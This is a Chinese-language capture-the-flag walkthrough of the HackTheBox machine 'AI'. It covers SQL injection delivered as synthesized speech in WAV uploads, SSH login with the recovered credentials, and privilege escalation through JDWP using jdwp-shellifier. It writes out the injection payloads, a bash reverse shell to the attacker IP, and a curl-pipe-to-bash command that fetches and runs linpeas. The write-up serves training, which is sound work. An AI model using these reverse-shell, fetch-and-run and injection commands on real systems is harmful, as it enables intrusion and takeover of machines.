终于又等到hackthebox更新退役靶机了,这次的靶机是AI。因为比较有意思所以来记录下。不过过程并非一帆风顺。其中还遇到靶机磁盘写满导致无法写入文件的事。删了半天才想起来要重设靶机......
跟上次一样参考了下大神的视频https://www.youtube.com/watch?v=7n7YRntu3bc&t=1391s视频真的非常良心。
(这次做之前更新kali虚拟机,又把自己的虚拟机弄死机了......好在现在不那么容易整体炸掉,倒是kali的界面越更新越舒适,挺不错的)
本机ip:10.10.15.60
靶机ip:10.10.10.163
首先第一步当然是探测端口了
nmap -sC -sV -oA ai 10.10.10.163
发现有22与80端口开放。既然有http服务,那就尝试直接访问吧。
有一个主页面。同时也发现了其他php文件,唯一比较有意思的就是下面这个ai.php
页面,有一个文件上传点。
但是很奇怪。居然是.wav
file。通常我所知道的文件上传点也就图片马或者phar反序列化或者其他类型的getshell。而它提示的drop your query using wav file.似乎是在说明我们可以进行查询操作。
那么首先随便传一个test.php上去。内容随意。发现没有回显。
看来是要wav
的音频文件了。使用音频文件执行查询,这点真的难以弄懂。那么在尝试弄清漏洞类型之前先来目录爆破一下,看有没有什么别的信息:
gobuster dir -u http://10.10.10.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
基于这里都是php,我们在gobuster后着重加上-x php
进行筛选。
解果大致如下:
/index.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/images (Status: 301)
/uploads (Status: 301)
/db.php (Status:301)
/intelligence.php(Status: 200)
/ai.php(Status: 200)
其中ai.php等等都是主页面就提供了的。新发现的页面包括intelligence.php
跟db.php
。上传跟图片界面我们都没有权限进去。那么访问下唯一可以访问的intelligence.php
发现了这个页面。似乎存在着词语的替换关系。从表的右列中我们不难找到一些熟悉的符号--union
,#
,---
,Schema
等等。这些都是常常出现在sql注入中的符号。结合我们还爆破出了db.php,可以猜想是否有sql注入的漏洞呢?
答案是正确的。而且脑洞大开的是:我们要用语言转成音频文件上传来进行注入。这也许就是这个AI靶机的名字所在吧。
首先google linux say command, 发现有这样的一个软件。叫做festival。
apt-get install festival
使用它其中一个叫text2wave的就能将语句转成语音文件。比如用下管道符,生成一个test.wav,内容为hello。
echo "Hello"| text2wave -o test.wav
尝试听下这个音频,发现是个男低音(也许是机器合成音?)然后再次尝试上传
发现input有结果,那么就尝试下翻译成英文来sql注入吧。
(这点对非英语母语的国家的人应该非常不友好......毕竟有些偏门的括号之类的英文我也不太熟)
( openparenthesis 左括号
) closeparenthesis 右括号
- hyphen 连字符
基于一开始还探测到的intelligence.php
中有些字符对应关系,不难想到我们需要使用那张表来绕过注入
比如我的尝试payload
' union select database()---
需要换作
open single quote, join select , database open parenthesis close parenthesis comment database
再重复上面生成test.wav的操作,就可以上传注入。
基于hackthebox易得user的尿性,可以猜出一张users表然后爆出username跟password
'union select username from user---
open single quote, join , select , username from users comment database
open single quote, join , select , password from users comment database
显然,我们的http页面并没有什么让我们登录进去的方法或页面。基于之前的端口探测发现有ssh开放,不妨尝试ssh登录
成功登陆。并且user.txt就在当前目录下。
之后就是常规提权的过程了。
这里开始可能会想到之前没成功访问的db.php,在/var/www/html
中爆出内容
可知username为
dbuser
,password为toor
进入mysql可用的就多了。(然而我进去的时候库被别人删了......)实际上可以爆出之前alexa所在user表的内容中
username:root
password:H,Sq9t6}a<)?q931
但是ssh登录并不成功。mysql这条路走不通。
众所周知,发现提权的漏洞点并不是一件容易的事,尤其是对我这样的小白而言。所以,我从dalao视频那发现了一个很厉害的脚本可以解决我自己的漏洞认知问题。
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
在靶机上使用其中的linpeas.sh
,脚本就会自动分析可能提权的漏洞点。着实解决不少问题。不过通常结果又臭又长,可能需要耐心找一找。
具体方法也很简单,本机git clone好后,起一个python监听(默认8000端口)
python -m SimpleHTTPServer
在靶机上直接curl后执行就好了
curl 10.10.15.60:8000/linpeas.sh | bash
这里从linpeas.sh的结果中可以发现一个JDWP的点被标红了。
那么jdwp是什么呢?我们搜索一下
JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息
而这是有漏洞利用的。比如知道创宇上的
https://www.seebug.org/vuldb/ssvid-89216
等等,都是jdwp的代码执行漏洞。那么我们接下来就用这个漏洞,尝试拿到root权限。
首先确定使用的工具
https://github.com/IOActive/jdwp-shellifier
jdwp-shellifier
(上面几个漏洞报告都是用的这个工具)之后考虑我们要执行的命令,当然是拿到root shell比较好。所以先在alexa的靶机的tmp目录下放一个反弹shell的脚本test.sh内容如下:
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.15.60/9002 0>&1'
然后给其执行的权限
chmod +x test.sh
调用时只需:
./test.sh
先本机监听下,没有问题,可以弹到alexa的shell。
接下来用到一个新学到的大招:端口转发。我们都知道,每次ssh登录这一靶机都要用户密码,十分麻烦。而且将要利用的jdwp是java的debug功能,据说操作时十分容易断开。那有没有什么方法可以本机处理这个jdwp呢?答案就是端口转发。原本自己以为十分复杂,但实际上并非如此。
首先在靶机上确认jdwp是运行在8000端口的。
那么我先进入tomcat的目录,按下~C
将直接进入ssh,然后将其转到localhost来研究
-L 8000:localhost:8000
这时我们在本机上使用
ss -lntp
查看主机监听的端口。就会发现8000端口处于监听状态了,user是ssh。我们也可以用同样的方法转发tomcat的8009和8080端口到本地,这样我们就能直接浏览器访问localhost:8080
来分析tomcat(当然这里没有什么帮助)
当然,这里转发到本地本来只是方便调试,因为可以直接在本地手动利用jdwp的漏洞,找到一个breakpoint用debug功能来执行命令。但是这方面实在不熟(java白学了),所以还是直接利用上面的脚本舒服啊。
shellifier用法
python jdwp-shellifier.py -t 目标主机ip -p jdwp运行端口 --cmd "Your Command"
这里我们直接
python jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/test.sh"
因为转发了ip,端口所以使用的ip是本地。而break-on这点方便找出可以利用的断点。最后的cmd执行我们的反弹shell。
本机再度监听后执行这个脚本
成功反弹shell到本机。即可拿到root.txt
感觉提权这方面自己还是不太熟悉,可能因为大部分ctf比赛注重的也只是getshell层面上的吧,之后的操作还要多加了解知识学习啊。